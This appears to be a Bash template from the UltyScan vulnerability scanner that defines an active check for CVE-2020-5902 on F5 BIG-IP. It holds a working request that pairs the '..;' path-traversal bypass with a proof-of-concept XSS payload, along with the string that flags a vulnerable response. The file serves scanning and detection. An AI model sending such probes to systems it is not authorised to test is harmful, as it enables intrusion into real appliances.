Files
UltyScan/templates/active/CVE-2020-5902_-_F5_BIG-IP_XSS.sh

9 lines
303 B
Bash

AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5902 - F5 BIG-IP XSS'
URI='/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=%3Csvg/onload=alert(1337)%3E'
METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'